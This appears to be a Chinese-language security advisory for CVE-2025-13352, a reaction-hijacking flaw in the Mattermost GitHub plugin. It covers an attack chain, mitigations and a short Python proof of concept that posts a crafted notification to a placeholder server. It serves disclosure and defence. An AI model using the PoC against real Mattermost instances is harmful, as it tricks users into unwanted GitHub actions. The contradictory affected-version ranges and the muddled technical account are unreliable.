CVE-2025-13352 Mattermost GitHub插件反应劫持漏洞

漏洞信息

漏洞编号

CVE-2025-13352

漏洞类型

身份验证绕过

CVSS评分

3.0 低危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Mattermost, Mattermost GitHub Plugin

漏洞概述

CVE-2025-13352是Mattermost平台及其GitHub插件中的一个身份验证绕过漏洞。该漏洞存在于反应转发（reaction forwarding）功能中，攻击者利用精心制作的恶意通知帖子，可以劫持GitHub反应功能，使用户在不知情的情况下向任意GitHub对象添加反应。由于Mattermost在处理GitHub通知时未能正确验证插件机器人身份，攻击者可以冒充合法插件向用户发送包含特殊构造的通知，诱导用户执行非预期的GitHub操作。此漏洞影响Mattermost 10.11.x至10.11.6版本以及GitHub插件2.4.0及以下版本，CVSS评分为3.0，属于低危漏洞。尽管评分较低，但该漏洞可能被用于社会工程攻击、钓鱼活动或干扰正常的GitHub工作流程。

技术细节

该漏洞的根本原因在于Mattermost GitHub插件在处理反应转发请求时缺少对插件机器人身份的验证。当GitHub插件收到来自Mattermost服务器的反应请求时，它依赖于请求中的某些标识符来判断请求来源，但没有正确验证这些标识符的真实性。攻击者可以通过以下方式利用此漏洞：首先，攻击者创建一个包含精心构造payload的通知帖子，该payload包含指向任意GitHub仓库或问题的引用；其次，当Mattermost用户收到并查看此通知时，如果用户点击了相关反应按钮，插件会将此反应请求转发到GitHub；最后，由于缺少身份验证，GitHub会接受这个来自伪造身份的请求，将用户的账户与攻击者指定的对象关联。攻击者可以利用此漏洞让用户在不知情的情况下star、watch或评论任意的GitHub仓库，破坏用户与正确仓库的关联，或用于传播恶意内容。

攻击链分析

STEP 1

步骤1

攻击者获取Mattermost实例访问权限，创建一个包含恶意payload的通知帖子

STEP 2

步骤2

目标用户收到通知帖子，payload包含指向攻击者控制的GitHub对象的引用

STEP 3

步骤3

用户查看通知并点击GitHub反应按钮（如点赞、评论等）

STEP 4

步骤4

Mattermost GitHub插件接收反应请求，但由于缺少机器人身份验证，未能识别请求来源的真实性

STEP 5

步骤5

插件将用户的反应请求转发到GitHub API，请求中包含用户的认证令牌

STEP 6

步骤6

GitHub接受请求，使用户账户与攻击者指定的GitHub对象（仓库、issue等）产生关联

STEP 7

步骤7

攻击成功，用户在不知情的情况下对任意GitHub对象执行了反应操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-13352 PoC - Mattermost GitHub Plugin Reaction Hijacking
# This PoC demonstrates the reaction hijacking vulnerability

import requests
import json

TARGET_URL = "https://vulnerable-mattermost-server.com"
ATTACKER_TOKEN = "attacker_webhook_token"
MALICIOUS_PAYLOAD = {
    "type": "github_notification",
    "action": "reaction",
    "target": {
        "owner": "attacker-controlled-org",
        "repo": "malicious-repo",
        "issue_number": 1
    },
    "reaction_type": "thumbsup"
}

def exploit_reaction_hijacking():
    """
    Exploit steps:
    1. Send malicious notification to target user
    2. User views notification and clicks reaction button
    3. Plugin forwards reaction to GitHub without proper bot identity validation
    4. User's reaction is applied to attacker-controlled GitHub object
    """
    exploit_url = f"{TARGET_URL}/api/v4/posts"
    headers = {
        "Authorization": f"Bearer {ATTACKER_TOKEN}",
        "Content-Type": "application/json"
    }
    response = requests.post(exploit_url, headers=headers, json={
        "channel_id": "target_user_channel",
        "message": "GitHub notification",
        "props": MALICIOUS_PAYLOAD
    })
    return response.status_code == 200

# Note: This PoC is for educational purposes only
# Actual exploitation requires authenticated access to Mattermost instance

影响范围

Mattermost < 10.11.6

Mattermost 10.11.x <= 10.11.6

Mattermost GitHub Plugin < 2.4.0

Mattermost GitHub Plugin <= 2.4.0

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时措施：1）禁用Mattermost GitHub插件的反应转发功能；2）审查并限制谁可以创建包含GitHub相关内容的通知帖子；3）启用双因素认证以增加攻击难度；4）监控GitHub账户的活动日志，及时发现异常反应行为；5）限制用户对未知来源通知的交互操作。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-13352
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-13352
3 Details https://www.cvedetails.com/cve/CVE-2025-13352/
4 VulDB https://vuldb.com/cve/CVE-2025-13352
5 Link https://mattermost.com/security-updates